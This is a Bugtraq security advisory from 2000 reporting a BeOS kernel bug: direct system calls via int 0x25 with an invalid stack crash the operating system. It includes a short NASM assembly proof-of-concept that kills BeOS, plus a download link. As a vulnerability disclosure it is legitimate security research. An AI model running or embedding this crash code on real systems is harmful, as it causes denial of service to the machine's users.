
Bugtraq: BeOS syscall bug


From: Konstantin Boldyshev <konst_at_LINUXASSEMBLY.ORG>
Date: Mon, 10 Apr 2000 13:16:28 -0000

Summary:

BeOS crashes when a system call with invalid parameters is
issued.

Details:

When using direct kernel calls through int 0x25 (not
libroot.so functions) BeOS dies on most system calls with
invalid parameters/stack. Although Be has registered this
bug before R5.0, it is present in R5.0, and is present at
least in all R4.5.x
(http://bebugs.be.com/devbugs/detail.php3?oid=2324160).
No fix is available, it's a kernel bug.

Here's a sample assembly program that kills BeOS (nasm):

section .text
global _start

_start:

        push dword msg
        push dword len
        push dword 1 ;stdout

        mov eax,3 ;sys_write
        int 0x25 ;must be a *call* to int 0x25,
                        ;then everything goes ok; i.e.
                        ;return address must be on the stack,
                        ;but it is not

        mov eax,0x3f ;sys_exit
        int 0x25

msg db "hello",0xa
len equ $ - msg

(source and binary can be downloaded at
http://linuxassembly.org/BeDie.tgz)

References:

http://www.escribe.com/software/bedevtalk/ - BeDevTalk
archives
(Feb-Mar 2000, search for topics "assembly & BeOS", "system
calls", "system call stress testing")

http://linuxassembly.org - Linux/UNIX assembly programming
portal
Received on Apr 10 2000
